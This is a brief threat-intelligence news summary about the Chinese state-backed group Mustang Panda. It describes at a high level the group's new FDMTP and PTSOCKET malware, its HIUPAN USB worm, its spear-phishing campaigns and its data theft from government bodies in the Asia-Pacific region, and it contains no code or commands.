Chinese Hackers Deploy New Data Theft Malware in Government Attacks

The Chinese state-backed cyber espionage group Mustang Panda has launched a new wave of attacks using malware variants FDMTP and PTSOCKET to steal sensitive data from government networks. These attacks demonstrate the group's evolving tactics in cyber operations targeting government and non-government entities, especially in the Asia-Pacific region.

  • New Malware Deployment: Mustang Panda is using two newly identified malware strains:
    • FDMTP: A secondary control tool embedded in a DLL for malware delivery via DLL sideloading.
    • PTSOCKET: A custom file transfer tool based on TouchSocket over DMTP for data exfiltration.
  • Worm-based Attack Chain:
    • The group is spreading malware using a modified variant of the HIUPAN worm, which infects removable drives and hides its presence, leaving behind only a disguised executable file, "USBConfig.exe," to trick users.
    • The PUBLOAD malware stager, delivered via the worm, acts as the main control tool for network reconnaissance and data collection.

HIUPAN infection and spread

  • Spear-phishing Campaigns:
    • Mustang Panda uses fast-paced spear-phishing campaigns to deliver malware like DOWNBAIT and PULLBAIT through decoy documents, triggering in-memory execution of malicious code.
  • Data Targeting and Exfiltration:
    • Attackers focus on stealing .DOC, .XLS, .PDF, .PPT files, which are archived in RAR format.
    • PUBLOAD and PTSOCKET facilitate the exfiltration process, often using tools like cURL to send the stolen data.
  • Government Entities Under Attack:
    • The group has specifically targeted entities such as the military, police, foreign affairs agencies, and education sectors in recent campaigns.
  • Abuse of Cloud Services:
    • Mustang Panda has previously abused cloud services like Google Drive and is now suspected of using Microsoft OneDrive to introduce malware into government networks.

The Mustang Panda group continues to advance its malware deployment strategies, particularly focusing on highly targeted government operations. With sophisticated methods like spear-phishing, worm-based attacks, and cloud service abuse, they remain a persistent threat in the cybersecurity landscape. Organizations must prioritize threat intelligence, vigilance, and robust security measures to mitigate these evolving threats.